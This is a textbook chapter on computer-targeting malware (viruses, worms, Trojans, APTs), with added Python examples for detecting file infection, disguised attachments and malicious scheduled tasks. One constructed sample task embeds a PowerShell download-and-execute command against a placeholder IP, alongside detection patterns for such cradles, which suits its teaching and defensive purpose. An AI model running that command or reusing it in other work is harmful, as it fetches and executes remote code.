3 Threat Factors—Computers as Targets
Learning Objectives
- Differentiate between viruses, worms, and Trojan horses.
- Explain the threat viruses pose to computers and computer users.
- Explain the threat worms pose to computers and computer users.
- Explain the threat Trojan horses pose to computers and computer users.
- Describe countermeasures to threats that target computers and mobile devices.
Cyberattacks are cheap and unconstrained by geography and distance to the target. Let’s compare a bank robbery with a ransomware attack on a bank. The goal of the attackers is the same: get money from the bank and get away without leaving evidence. A bank robber has to stake out the bank, learn about the employees’ behavior, learn when money is delivered to and picked up from the bank, and find out whether the bank has a security guard and, if so, what the guard’s routine is. A bank robber often also needs an accomplice to stay outside and watch for police or drive the getaway car. The bank robber then has to plan the attack, carry it out without incident, and get away with the money. The bank robber has to stash the money in a safe but accessible place and eventually starts spending it. Banks now very often hold marked money, which makes it easier to catch the robber. The whole process is time consuming and risky. Bank robbery is a serious felony, and police will spend significant resources to catch the criminal.
Now compare the bank robbery with a ransomware attack on a bank. The attacker does not need help from others. All that is needed is a computer and a network connection. The cyberthief breaks into the bank’s systems and encrypts the data. The bank now cannot operate its business because it can’t access its data, including customer accounts. The cyberthief sends a message to the bank manager saying that if the bank wants its data decrypted it must pay a ransom of $100,000 in bitcoin (a digital currency whose transactions are recorded publicly but are not tied to names, which makes them hard for law enforcement to trace back to a person). If the bank refuses to pay, the data stay encrypted. Typically, the cyberthief sets a deadline to put pressure on the victim. The bank can try to decrypt its own data by hiring experts or with the help of law enforcement, but with properly implemented encryption that is usually not possible; the realistic alternative to paying is restoring from backups that the attacker could not reach. The cyberthief simply has to wait. He or she does not have to be physically present or even near the bank and could be in a different country. The risk of detection is low: the traces an attacker leaves (log entries, network connections, payment addresses) point at rented servers, proxies, and pseudonymous accounts rather than at a person. Attribution of the attack, that is, identifying who committed it, is very difficult and even in major attacks often not possible with certainty. For instance, even though the U.S. government assessed that Russia hacked the Democratic Party during the 2016 election campaign and possibly interfered with the election, little of the underlying evidence linking Russia to the security breaches has been made public. Thus, in a ransomware attack it is unlikely that the attacker will be caught. These differences between a traditional bank robbery and a cyberattack on a bank demonstrate why cybercrime has drastically increased and will likely continue to increase. They also demonstrate the difficulty cybersecurity specialists in government and private industry face when dealing with cybercrime.
Case Study 3.1: The Top 10 Data Breaches1
- Yahoo—2014
The hackers stole information from 500 million account holders.
- FriendFinder Network—2016
FriendFinder is the parent company of about 49,000 dating websites. In 2016, data from 412 million users was breached, going back as far as 20 years.
- MySpace—2016
The company “lost” 360 million user passwords.
- Experian—2012
More than 200 million Social Security numbers were breached after the credit reporting company acquired the data firm Court Ventures.
- USA Voter Database—2015
Voter information from 191 million people dating back to 1990 was stolen.
- LinkedIn—2012
In 2016, LinkedIn admitted that 165 million accounts had been breached.
- Nasdaq Stock Exchange—2012
Attackers stole more than 160 million credit and debit card numbers.
- eBay—2014
Fraudsters gained access to 145 million user accounts.
- Heartland Payment System—2009
Magnetic strip information from 100 million credit cards was stolen.
- VK—2016
The Russian counterpart of Facebook was breached and 100 million accounts were exposed.
What Do You Think?
- Think about what user information each of these companies hold. What are the negative consequences for the victims of the data breach for the different companies?
The Evolution of Cybercrime
Phases of Convergence
There are three phases of convergence in the evolution of cybercrime. In Phase 1 of convergence, technology is separate from people. This phase is also referred to as the sneakernet era because people had to physically carry a floppy disk or other removable medium to a computer to transfer malware onto it. The first Apple virus, Elk Cloner, spread on Apple II game floppy disks.
In Phase 2 of convergence, man is leveraging technology, that is, man is using technology. In this phase, fraudsters developed the first e-mail-borne viruses, such as ILOVEYOU and the Melissa virus, which spread via e-mail attachment. Everyone who opened the attachment infected their computer.
In Phase 3 of convergence, technology replaces people. The first malware that fell into this phase was Code Red, discovered in 2001. Code Red attacked computers running Microsoft’s IIS web server, exploiting a buffer overflow with specially crafted HTTP requests, and spread to other systems the same way. The Code Red worm does not respond to the owner’s commands; it operates independently. (A later variant, Code Red II, additionally created a backdoor into the operating system of the infected computer.) The computer owner does not know what the worm will do with the computer. The original Code Red attempted a denial-of-service (DoS) attack on the White House: all machines infected with the worm were programmed to flood the White House web server’s address with requests at the same time, in order to overwhelm the server. People who had computers infected with Code Red not only had an infected machine but were potentially also suspected of taking part in a crime (i.e., the DoS attack) against the White House.2
Phase 3 of convergence was also the beginning of the era of cyberspying. People do not have to be physically present in one country to spy out information on computers in another country; instead, they can infiltrate computers and steal information by using computer programs such as Trojan horses. This chapter discusses viruses, worms, and Trojan horses in detail and provides examples for each.
Reference Report: CIA Report on Russian Hacking of Democratic Party
https://www.intelligence.senate.gov/sites/default/files/documents/ICA_2017_01.pdf
Main Targets in Information Technology
Cybercrimes are a growing problem in need of new solutions. A whopping 74% of businesses are expected to be successfully hacked in 2017. By 2020, the economic cost of cybercrime is expected to exceed $3 trillion. Increasingly, nation-states are behind the attacks, which results in more sophisticated attacks and attacks on critical infrastructure.6 There are three main targets in information technology: software, hardware, and the network. Table 3.1 provides some examples of the vulnerabilities of software, hardware, and networks. Throughout this book we explain these vulnerabilities and countermeasures in detail.
Think About It 3.1: Russian Cyberspies and the 2016 Presidential Election
U.S. intelligence agencies agree that Russia’s President Vladimir Putin and state-sponsored hackers were behind hacking incidents against the Democratic Party during the 2016 presidential election campaign. A report by the Office of the Director of National Intelligence from January 2017 states that the evidence strongly implicates Russia as the origin country of the hackers and cyberspies.3 An earlier joint report released by the FBI and the Department of Homeland Security in December 2016 also concludes that Russia interfered with the election process by stealing and releasing private information, including internal e-mails.4
Just as the Russians infiltrated the computers of the Democratic Party, the FBI and CIA also had to get their information from insiders or by spying on the Russians. Russia believes that the insider information came from one of its own agencies. In January 2017 it became known that Sergei Mikhailov, a senior officer in the cybersecurity unit of Russia’s Federal Security Service (FSB), had been arrested on treason charges for allegedly passing information about Russian hacking to the CIA.5
What Would You Do?
- How has the Internet changed the ability of political espionage?
- Read the CIA Report on the Russian Hacking of the Democratic Party. What evidence does the report present?
Table 3.1 Vulnerabilities of Software, Hardware, and Networks
 | Software | Hardware | Network
Attacks | Infected download links for software or software updates; malicious apps; drive-by downloads | Manufacturing backdoors; backdoor creation; access to protected memory; hardware modification; inducing faults; counterfeit products | Denial-of-service attacks; man-in-the-middle attacks; browser attacks; brute force; SSL attacks; scanning; attacks on Domain Name Servers; backdoors7
Devices | Computers; computer networks; smart devices | Access control systems; network appliances; industrial control systems; surveillance systems; components of communication infrastructure | Computers; modems; routers
Countermeasures | Anti-virus software; security patches; data backup; software screening | Tightly controlled production; detection measures to discover compromised hardware8 | Network-based mitigation; host-based mitigation; proactive measures9
Cybersecurity is concerned with three main issues: (1) confidentiality of the data, (2) integrity of the data, and (3) availability of the data. Confidentiality refers to keeping private information private. This includes classified government documents, such as the engineering of the latest fighter planes, but also trade secrets, such as the design of a wind turbine. If other governments or companies can steal such data, they could build the same fighter planes or develop defenses against them. Integrity of the data means that the data are correct and have not been altered without authorization. If criminals can manipulate data, people can be injured or killed. For instance, if cybercriminals could manipulate the software that controls a power plant, the plant could be shut down or physically damaged, causing power outages and injury or death to workers. Availability means that the persons who need access to a system actually have access whenever they need it. If there were an attack on the power plant, operators might be able to stop a disaster as long as they still have access to the control system. But if they are locked out and unable to control the system, they would have no opportunity to stop the attack.10
These main components of cybersecurity—confidentiality, integrity, and availability—are the main targets of cybercriminals. They try to steal confidential data, manipulate data, or make data unavailable. The tools used to accomplish these goals range from computer viruses and malware to cyberwar and cyberterrorism. Computers can be the target of cybercrimes, but they can also be a tool for cybercrimes. For instance, hackers may target a computer or computer network to gain access to data or disrupt the functioning of the computer (see Chapter 4). At the same time, computers are used as a tool by hackers to break into the network system of a company or to engage in crimes such as cyberstalking or pornography (see Chapter 4).
There are three main threat clusters: (1) technological, (2) sociopolitical, and (3) human-machine. In the technological cluster, computers are the target of the cybercrime—mainly malware, such as viruses and worms. The sociopolitical cluster includes crimes where computers are used as a tool, such as phishing or identity theft. The human-machine cluster focuses on computer infrastructure and vulnerabilities created through our dependence on computers and networks. For instance, many people use the Internet to make money. This includes bloggers, news agencies, advertising agencies, video producers, financial planners, etc. Their ability to work depends on an open Internet environment. This open environment, of course, also aids criminals because it makes it easy to commit crimes against computers and with the help of computers.11
This chapter discusses the different types of cyberthreats against computers and countermeasures to these cyberthreats. The following chapter continues the threat analysis by focusing on computers as a tool to commit cybercrimes.
Computers as a Target
Computers are used to execute commands, such as calculating a value, sending information to another computer, or performing whatever tasks the user needs. As a student, you instruct your computer to open a Word document, write into that document, save the document, and send it to your professor. Some software that runs on your computer may disrupt its performance. Imagine you are trying to open the paper you started writing the day before but all you get is an encrypted, unreadable Word document. It’s possible that you downloaded malicious software (malware) that encrypted your files and makes it impossible for you to access your documents. The term malware combines the words malicious and software. Malware is a computer program or piece of software written by someone with malicious or criminal intent. It is code written to destroy, disrupt, or steal data, or do other damage to a computer or network. Malware fulfills two main functions: spreading itself and causing damage. Malware typically spreads via e-mail attachments, code embedded in web pages, file sharing, infected CDs, DVDs, or USB drives, or by scanning a computer or network for exploitable vulnerabilities. For instance, a user may click on a web page link to download software needed to run a specific program, such as Adobe Flash. That “Adobe Flash” download may in fact be malware that infects the computer. The damage that such malware can cause ranges from trivial to very serious. Trivial damage may be a message that pops up on the screen every time the user starts the computer. But the damage can also be debilitating: destroying files, taking the computer hostage, or stealing data and passwords to facilitate other crimes, such as identity theft. One of the most common forms of damage is enlisting the computer as a bot that sends spam to other computers, hosts illegal data, attacks other computers, or is used to extort others. Not all malware becomes active right away. Some malware can be activated remotely or is programmed to activate after a certain amount of time so that it can spread without being noticed right away.12
Threats to Mobile Devices
Whereas malware has traditionally targeted computers and computer networks, the lightning-speed spread of mobile devices has become a new and fruitful market for malicious code developers. Similar to computers, mobile devices are vulnerable to all sorts of malware, including viruses, worms, and Trojan horses. There are five main reasons for the increase in threats to mobile devices.13 First, the increase in smartphones has led to a significant drop in the prices users pay and a substantial increase in the number of smartphones people own. In addition to smartphones, there has also been a growth in the health tracker industry, and devices such as Fitbit or Garmin Vivofit have become very popular. Even smartwatches are no rarity: Pebble, Apple Watch, and Samsung GearS2 may be the most popular models. In addition to smartphones, smartwatches, and health trackers, many people also have a tablet, such as a Kindle or an iPad. All of these devices can communicate via Wi-Fi and Bluetooth. Their ability to communicate with each other is of great convenience for the users and also for criminals who are trying to steal data, hijack a mobile device, or manipulate the device in other ways. For instance, if a criminal infects one device with a malware, the infection may spread to the other devices and other people’s devices.
Second, malware intrusion has mainly concentrated on Android devices. Android is based on the Linux kernel, is developed by Google, and is released as open source, which lets developers freely create and add applications, features, and updates, and lets users install applications from outside the official app store. Unfortunately, this also enables criminals to distribute malicious applications and fake updates. Security updates are not delivered centrally by Google; they are passed on by the device manufacturers and carriers, often late or not at all, so many Android devices run for a long time without current security patches and are therefore highly vulnerable to malware.
Third, smartphone users are storing much information on their devices, including financial information, credit card numbers, user names and passwords, pictures, etc. Many people use the app “Wallet,” which enables them to pay with the phone. Others use a personal finance or budgeting app such as “Mint” where they record all of their expenses and income. For criminals, this is easy-to-steal information, which can then be used for financial gain, identity theft, and to spread the malware to other devices.
Fourth, smartphone hardware has become increasingly sophisticated, and so has the capability of smartphone operating systems. These increased capabilities are helpful for developers of applications and make smartphones much more useful for customers, but malware writers also profit from this opportunity. They can develop more sophisticated malware and infiltrate a smart device without the owner ever noticing.
Finally, programming software for smartphones is similar to that of PCs. Malware developers can simply transfer from the PC environment to the smartphone.14
There are many different forms of malware, and each has its own way of behaving, being triggered, and spreading.15 This chapter focuses on three main forms of malware threats: computer viruses, Trojan horses, and worms. All three can be used to disrupt computers and networks, steal data, or establish the persistent foothold on which an advanced persistent threat is built. As the following case study shows, even sophisticated organizations are vulnerable to a malware attack. The threats posed by viruses, worms, and Trojan horses are discussed in more detail in the following sections.
Case Study 3.2: Democratic Election Campaign—Hackers Steal Campaign Information
For over a year, hackers attacked political entities that supported the Democratic election campaign. An official said, “If they wanted to get into a system, they got into the system.” A private investigator who had been hired by the campaign found several data breaches, some of which had substantial negative consequences for the campaign.16
The most detrimental attack was the hacking of the Democratic National Committee (DNC), where the hacker Guccifer 2.0 stole nearly 20,000 e-mails, including private e-mails. The e-mails and other information, such as financial contributions, were then fed to WikiLeaks, which published them on July 22, 2016. The e-mails stem from seven members of the DNC, including communications directors, finance directors, and key senior advisers covering a period of January 2015 until May 2016. WikiLeaks provided a searchable database of these e-mails, and information from the e-mails quickly became public.17
The e-mails revealed that the DNC chairwoman, Debbie Wasserman Schultz, had exchanged e-mails with a variety of people and entities in an effort to discredit Bernie Sanders and help Hillary Clinton win the Democratic Party endorsement. The DNC is supposed to be a neutral entity supporting each candidate equally and without bias. As a consequence of the leaked e-mails, Debbie Wasserman Schultz resigned from her position and the DNC issued an apology to Bernie Sanders, who had been disadvantaged in the preliminary elections.18
A few days later, investigators of the Democrats found that hackers had hacked into the analytics data program and stole data about voters. The hackers had access to the data for approximately 5 days. The Clinton campaign stated that no personal voter information was stolen and that the hackers did not get into the internal campaign servers, which are independent from the analytics data program.19
What Do You Think?
- Discuss the possible motives of the hackers.
- Do you believe that all e-mails of all election campaigns (Republicans and Democrats) should be public so that the voters have full knowledge, or should these e-mails remain secret? Discuss pros and cons.
- Discuss whether leaked e-mails from your private account could damage your own reputation. How can you protect the privacy of your e-mails?
Viruses, Worms, and Trojan Horses
Viruses
A virus is a “small software program designed to spread from one computer to another and to interfere with computer operation.”20 A virus is code that copies itself into a host program when it is activated. Every company has at least one employee who will click on anything and open any file he or she receives. Not surprisingly, hackers are well aware of that, and so 90% of all cyber intrusions start with a phishing e-mail.21 Virus files are typically executable files, that is, files that the computer runs directly. On Windows they typically end in .exe. The extension may be hidden, however, to prevent users from becoming suspicious. Executable files contain machine code rather than readable text, so a user cannot inspect them the way a document can be read. Once the user opens or runs the program, the virus spreads further and infects other programs or the entire computer. Imagine you downloaded what looked like a music file from the Internet but was in fact an executable carrying a virus that targets Excel. When you run the file, the virus installs itself, and the next time you start Excel it is activated and begins to destroy your Excel files.
Image 3.1 Computer Virus
©iStockphoto.com/joxxxxjo
One of the first to experiment with computer viruses was Fred Cohen, who developed self-replicating miniprograms in the 1980s and warned early about the risks associated with these programs. Cohen compared computer viruses to a disease:
As an analogy to a computer virus, consider a biological disease that is 100% infectious, spreads whenever animals communicate, kills all infected animals instantly at a given moment, and has no detectable side effects until that moment. . . . If a computer virus of this type could spread throughout the computers of the world, it would . . . wreak havoc on modern government, financial, business, and academic institutions.22
Cohen was able to show that viruses can attach themselves to other programs and cause denial of service (i.e., interrupting a service or making a program unusable). He defined a virus as “a program that can infect other programs by modifying them to include a possibly evolved copy of itself.”23 Programs that are infected by a virus can then also spread the virus. Cohen was also one of the first to write about the dangers of the lack of security systems at companies, institutions, and individual users. At the time, very few institutions were aware of the real threat, and there was no system that could have stopped a virus.24 Even though the development of antivirus programs began in 1987 with Bernd Fix, the real advances didn’t start until 1991 with Norton Antivirus. At that time, viruses developed much faster and were well ahead of antivirus programs. Since 1987, antivirus programs have made significant progress, but they continue to trail the development of new viruses by cybercriminals.25
There are three main types of viruses: (1) shell viruses, (2) add-on viruses, and (3) intrusive viruses. Shell viruses wrap a shell around the original host program so that the virus runs first and takes over the host program’s functions, passing control to the unchanged original code afterwards. Add-on viruses attach their code to the original program and change its entry point, so the viral code executes before the original code and interferes with the program the user attempts to run. Intrusive viruses overwrite part of the original code, which can leave the host program dysfunctional.26
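All three infection patterns change the bytes of the host program: a shell or add-on virus makes the file grow, while an intrusive virus overwrites code in place and may leave the size unchanged. That is why a baseline of file hashes is a classic countermeasure against file infectors. The following Python program is an added example written for this chapter, not code from the book; it builds a baseline of sizes and SHA-256 hashes over program files, reports what changed, and in `demo()` creates a few constructed files in a temporary directory and edits them with ordinary file writes (appending bytes, overwriting bytes, adding a file) to stand in for the three patterns. No actual virus code is involved.

```python
"""Hash-based integrity baseline for program files (added example)."""
import hashlib
import os
import tempfile

PROGRAM_SUFFIXES = (".exe", ".com", ".dll")  # assumption: what counts as a program file


def sha256_of(path):
    """SHA-256 of a file, read in chunks so large binaries do not fill memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_baseline(root, suffixes=PROGRAM_SUFFIXES):
    """Map each program file under root (relative path) to its size and hash."""
    baseline = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(suffixes):
                path = os.path.join(dirpath, name)
                rel = os.path.relpath(path, root)
                baseline[rel] = {"size": os.path.getsize(path), "sha256": sha256_of(path)}
    return baseline


def check_integrity(root, baseline, suffixes=PROGRAM_SUFFIXES):
    """Compare the current file set against the baseline.

    Returns a sorted list of (relative path, finding). The size comparison is a
    hint only: a changed hash is the real signal, whatever the size did."""
    current = build_baseline(root, suffixes)
    findings = []
    for rel, old in baseline.items():
        new = current.get(rel)
        if new is None:
            findings.append((rel, "missing"))
        elif new["sha256"] != old["sha256"]:
            delta = new["size"] - old["size"]
            if delta > 0:
                findings.append((rel, "modified, grew by %d bytes (code appended)" % delta))
            elif delta == 0:
                findings.append((rel, "modified, same size (code overwritten in place)"))
            else:
                findings.append((rel, "modified, shrank by %d bytes" % -delta))
    for rel in current:
        if rel not in baseline:
            findings.append((rel, "new program file"))
    return sorted(findings)


def demo():
    """Constructed scenario: baseline three files, then alter them and re-check."""
    with tempfile.TemporaryDirectory() as root:
        # Constructed stand-ins for program files; the bytes are arbitrary.
        samples = {
            "calc.exe": b"MZ" + b"\x90" * 200,
            "tool.com": b"\xb8\x00\x4c\xcd\x21" * 20,
            "notes.txt": b"not a program, ignored by the baseline",
        }
        for name, data in samples.items():
            with open(os.path.join(root, name), "wb") as handle:
                handle.write(data)
        baseline = build_baseline(root)

        # Add-on / shell pattern: the host grows because code is attached to it.
        with open(os.path.join(root, "calc.exe"), "ab") as handle:
            handle.write(b"\xcc" * 64)
        # Intrusive pattern: bytes overwritten in place, size unchanged.
        with open(os.path.join(root, "tool.com"), "r+b") as handle:
            handle.seek(0)
            handle.write(b"\x00" * 5)
        # A program file that was not in the baseline at all.
        with open(os.path.join(root, "update.exe"), "wb") as handle:
            handle.write(b"MZ")

        return check_integrity(root, baseline)


if __name__ == "__main__":
    for rel, finding in demo():
        print("%-12s %s" % (rel, finding))
```

The caveat a practitioner should keep in mind: a hash baseline only sees what the operating system returns when the file is read. A stealth virus that intercepts file reads and hands back the original bytes defeats this check, which is why baselines are best taken and verified from clean boot media.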
One of the most destructive viruses to hit the United States was “ILOVEYOU,” which caused damages estimated at around $10 billion worldwide. The virus arrived as an e-mail with the subject line “ILOVEYOU” and fooled users around the globe. The e-mail said, “kindly check the attached LOVELETTER coming from me,” and carried an attachment named “LOVE-LETTER-FOR-YOU.TXT.vbs.” Windows hides the extension of known file types by default, so the .vbs extension was not shown and users saw what looked like a plain text file. Users who opened the attachment ran the .vbs script (the virus), which then sent itself to every contact in the user’s Outlook address book. Because it spread on its own by e-mail, ILOVEYOU is technically a mass-mailing worm, although it is commonly called a virus. According to estimates, it affected over 15 million computers within 10 days, about 10% of all computers connected to the Internet worldwide at the time. ILOVEYOU was a simple virus in that it did not attempt to hide. It was very obvious to users that something was wrong with their computer.27
Since then, malware has evolved and become more sophisticated. Modern malware is built to operate in stealth and avoid detection, and it is often one component of a larger operation. Long-running, stealthy intrusions by well-resourced adversaries are called advanced persistent threats (APTs). APTs are “cyber attacks executed by sophisticated and well-resourced adversaries targeting specific information in high-profile companies and governments, usually in a long term campaign involving different steps.” Originally, APT referred only to cyber intrusions against military targets, but APTs now target a wide range of industries and governments. APTs can be distinguished from traditional threats by their characteristics. Table 3.2 shows the differences between traditional attacks and APT attacks.28
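The deception in ILOVEYOU lies entirely in the file name: a decoy extension (.txt) in front of the real, executable one (.vbs), which the file browser hides. The Python program below is an added example written for this chapter, not code from the book. It shows what a user sees when known extensions are hidden and implements the check a mail gateway should make, which looks only at the last extension and flags a script or executable hiding behind a document-like name. The extension lists are assumptions chosen for the example, not a complete policy, and the file names in the test are constructed.

```python
"""Attachment-name check for the hidden-extension trick (added example)."""
import os

# Extensions that Windows runs as programs or scripts when double-clicked.
# Assumption for this example; a real gateway policy would be longer.
EXECUTABLE_EXTENSIONS = {
    ".exe", ".com", ".scr", ".pif", ".bat", ".cmd", ".vbs", ".vbe",
    ".js", ".jse", ".wsf", ".wsh", ".hta", ".ps1", ".lnk",
}

# Extensions most users read as "just a document or picture": ideal decoys.
DECOY_EXTENSIONS = {".txt", ".doc", ".docx", ".pdf", ".jpg", ".jpeg", ".png", ".mp3"}

RIGHT_TO_LEFT_OVERRIDE = "\u202e"  # reverses display order of the characters after it


def displayed_name(filename):
    """What a file browser shows when it hides the extension of known file types.

    Only the last extension is removed, so 'LOVE-LETTER-FOR-YOU.TXT.vbs' is
    displayed as 'LOVE-LETTER-FOR-YOU.TXT' and passes for a text file."""
    stem, ext = os.path.splitext(filename)
    return stem if ext else filename


def analyze_attachment(filename):
    """Classify an attachment by its real (last) extension, not the displayed one.

    Returns a dict with the true extension, whether it is executable, whether a
    decoy extension precedes it, and a verdict usable by a mail filter."""
    stem, true_ext = os.path.splitext(filename)
    true_ext = true_ext.lower()
    # Padding spaces between the decoy and the real extension ("invoice.pdf      .exe")
    # push the real one out of view; strip them before looking for the decoy.
    _, inner_ext = os.path.splitext(stem.rstrip())
    inner_ext = inner_ext.lower()

    executable = true_ext in EXECUTABLE_EXTENSIONS
    decoy = executable and inner_ext in DECOY_EXTENSIONS
    rtl_trick = RIGHT_TO_LEFT_OVERRIDE in filename

    if rtl_trick:
        verdict = "block: right-to-left override character in file name"
    elif decoy:
        verdict = "block: executable disguised as %s" % inner_ext
    elif executable:
        verdict = "block: executable attachment"
    else:
        verdict = "allow"

    return {
        "filename": filename,
        "displayed_as": displayed_name(filename),
        "true_extension": true_ext,
        "executable": executable,
        "double_extension_decoy": decoy,
        "verdict": verdict,
    }


if __name__ == "__main__":
    for name in ("LOVE-LETTER-FOR-YOU.TXT.vbs", "notes.txt", "invoice.pdf      .exe"):
        info = analyze_attachment(name)
        print("%-30r shown as %-24r -> %s" % (name, info["displayed_as"], info["verdict"]))
```

The design point is that the filter never trusts what the user will see; it classifies by the extension the operating system will actually act on. Blocking by true extension is cheap, but it is a name check only, so it belongs in front of content scanning (file-type sniffing, macro detection), not in place of it.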
Table 3.2 Traditional Attacks Versus APT Attacks
 | Traditional attacks | APT attacks
Attacker | Single hackers or a loose community of hackers | Skilled, highly organized, and well-resourced groups
Target | Typically individual computers or devices, nonspecific | Highly targeted: specific organizations, with a clear objective
Purpose | Profit, fame, challenge | Specific information of strategic value held by companies and governments
Approach | Single run, mostly easy to detect | A long-term campaign of persistent attacks, using stealthy and evasive techniques that can stay undetected
Source: Chen P., Desmet L., Huygens C. (2014) A Study on Advanced Persistent Threats. In: De Decker B., Zúquete A. (eds) Communications and Multimedia Security. CMS 2014. Lecture Notes in Computer Science, vol 8735. Springer, Berlin, Heidelberg.
An example of an APT is the group known as “Deep Panda,” one of the most advanced Chinese state-affiliated hacking groups. Deep Panda targets government officials, defense contractors, think tanks, and financial institutions with the goal of gathering sensitive information. The hackers use Windows PowerShell scripts to get into computer systems. Administrators often do not notice, because the scripts that carry the malware are launched as scheduled tasks and look like routine maintenance jobs. Once executed, the malware is loaded directly into memory and leaves few artifacts on disk.29 According to news reports, an attack on the computers of the U.S. Office of Personnel Management compromised the information of 4 million current and former federal employees. For several months, the hackers copied several gigabytes of data undetected. Even after the Cyber Incident Response Team found the intrusion, it took them 2 months to lock the intruders out of the system. The response team stated that the hackers were continuing to try to get back in.30 Both traditional and APT attacks pose five main risks for private computer users, companies, and government entities: (1) disabling computers and mobile devices, (2) sending spam, (3) providing access to computers, (4) stealing personal information, and (5) hijacking the user’s web browser.31
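The Deep Panda technique described above, PowerShell launched from a scheduled task with the payload kept out of files, is detectable precisely because the task definition has to name the command line. The Python program below is an added example written for this chapter, not code from the book and not a vendor ruleset. It triages constructed scheduled-task creation records (simplified to task name, command, and arguments; real Windows telemetry such as Security event 4698 carries the same fields inside XML) by scoring PowerShell switches that legitimate jobs rarely need, decoding any `-EncodedCommand` value (base64 of UTF-16LE text) and looking inside it for download-and-execute patterns. The weights, threshold, task names, and the 198.51.100.7 address (a documentation-range IP) are assumptions for the example.

```python
"""Triage of scheduled tasks that launch PowerShell (added example)."""
import base64
import re

# Switches seldom used by legitimate scheduled jobs. Weights are assumptions.
SWITCH_RULES = [
    (re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+[A-Za-z0-9+/=]+", re.I),
     "encoded command", 2),
    (re.compile(r"(?:^|\s)-w(?:indowstyle)?\s+hidden", re.I), "hidden window", 1),
    (re.compile(r"(?:^|\s)-(?:ep|exec|executionpolicy)\s+bypass", re.I),
     "execution policy bypass", 1),
    (re.compile(r"(?:^|\s)-nop(?:rofile)?\b", re.I), "profile suppressed", 1),
    (re.compile(r"(?:^|\s)-noni(?:nteractive)?\b", re.I), "non-interactive", 1),
]
# Content patterns checked on the raw arguments and on the decoded payload.
CONTENT_RULES = [
    (re.compile(r"\biex\b|invoke-expression", re.I), "invoke-expression", 2),
    (re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient", re.I),
     "download cradle", 2),
    (re.compile(r"frombase64string", re.I), "inline base64 decode", 1),
]
ENCODED_VALUE = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_command(arguments):
    """Plaintext of a -EncodedCommand value (base64 over UTF-16LE), or None."""
    match = ENCODED_VALUE.search(arguments)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_task(record):
    """Score one task-creation record; only PowerShell launches are scored."""
    arguments = record["arguments"]
    reasons, score, decoded = [], 0, None
    if "powershell" in record["command"].lower() or "pwsh" in record["command"].lower():
        for pattern, label, weight in SWITCH_RULES:
            if pattern.search(arguments):
                reasons.append(label)
                score += weight
        decoded = decode_encoded_command(arguments)
        for pattern, label, weight in CONTENT_RULES:
            if pattern.search(arguments) or (decoded and pattern.search(decoded)):
                reasons.append(label)
                score += weight
    return {"task": record["task"], "score": score, "reasons": reasons, "decoded": decoded}


def triage(records, threshold=3):
    """Records scoring at or above threshold, most suspicious first."""
    scored = [analyze_task(r) for r in records]
    return sorted((s for s in scored if s["score"] >= threshold), key=lambda s: -s["score"])


def _encode(powershell_text):
    """Build a -EncodedCommand value the way PowerShell expects it."""
    return base64.b64encode(powershell_text.encode("utf-16-le")).decode("ascii")


# Constructed records, not real telemetry. The third mimics a task hiding under
# a Microsoft-looking name, as in the Deep Panda description.
SAMPLE_TASK_EVENTS = [
    {"task": r"\GoogleUpdateTaskMachineUA",
     "command": r"C:\Program Files\Google\Update\GoogleUpdate.exe",
     "arguments": "/ua /installsource scheduler"},
    {"task": r"\IT\DiskCleanup",
     "command": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "arguments": r"-NoProfile -File C:\Scripts\cleanup.ps1"},
    {"task": r"\Microsoft\Windows\AppID\CertStoreCheck",
     "command": "powershell.exe",
     "arguments": "-NoP -NonI -W Hidden -Exec Bypass -Enc " + _encode(
         "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/s.ps1')")},
]


if __name__ == "__main__":
    for hit in triage(SAMPLE_TASK_EVENTS):
        print(hit["task"], hit["score"], ", ".join(hit["reasons"]))
        print("  decoded:", hit["decoded"])
```

The legitimate cleanup task scores one point for `-NoProfile` alone and stays below the threshold, which is the intended behavior: no single switch is conclusive, but a hidden, non-interactive, policy-bypassing, encoded command that decodes to a download cradle is the combination a hunter wants to see surfaced first.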
Risks Created by Viruses
- Disable computers and mobile devices
Some viruses can cause the computer or mobile device to stop functioning properly. Disabling devices carries great risks for companies and people. Such malware may disable alarm systems in homes or businesses, or it can cripple the defense networks of government and the military. One such incident occurred in 2008 when malware (the agent.btz worm) penetrated the networks of the Department of Defense (DoD). It was transferred to a DoD computer via an infected USB flash drive brought in from outside by an authorized user. The malware spread through classified and unclassified networks and was designed to give its author control over infected systems. It took 14 months and $1 billion to recover from the attack, and the true extent of the compromise remains unknown.32
- Send spam
Viruses are often capable of accessing the address book of the infected computer or mobile device and sending spam messages with itself attached to friends, family, and colleagues of the victim. If these users opened the attachment in the belief it came from a friend, they infected their own computer or mobile device. This is also a common scheme through Facebook. Users may receive an e-mail from a “friend” with a picture or video attached and are asked to open the file. The file contains a virus, and the e-mail did not come from their Facebook friend.
- Provide access to computers
Viruses may be written with the purpose to give the malicious writer control over the computer or mobile device. Control over the device can serve the purpose of stealing data, controlling certain functions of the computer, or manipulating files on the computer, such as encrypting files or changing the security settings. If an outside person changes the security setting, the owner of the device may be locked out. Imagine a hospital being locked out of their computer system. Without access to medical records, patients cannot receive treatment.
- Steal personal information
Criminals often target computers to gain information they can use to steal someone’s identity, steal his or her money, or get information from the computer that would help them make money. For instance, a criminal may try to get information about stocks before the market opens to make certain bids that will be financially beneficial. This type of trading is illegal, of course.
- Hijack the user’s web browser
Viruses can also hijack a computer’s web browser, controlling where it takes the user and what it displays, and the same applies to the messaging functions of a mobile device. The person controlling the device can push messages to the victim and to everyone found in the device’s address book. Many devices download incoming messages and attachments automatically, before the user opens anything; disabling the automatic download of text messages and e-mail attachments removes that opening.33
Risks to Mobile Devices
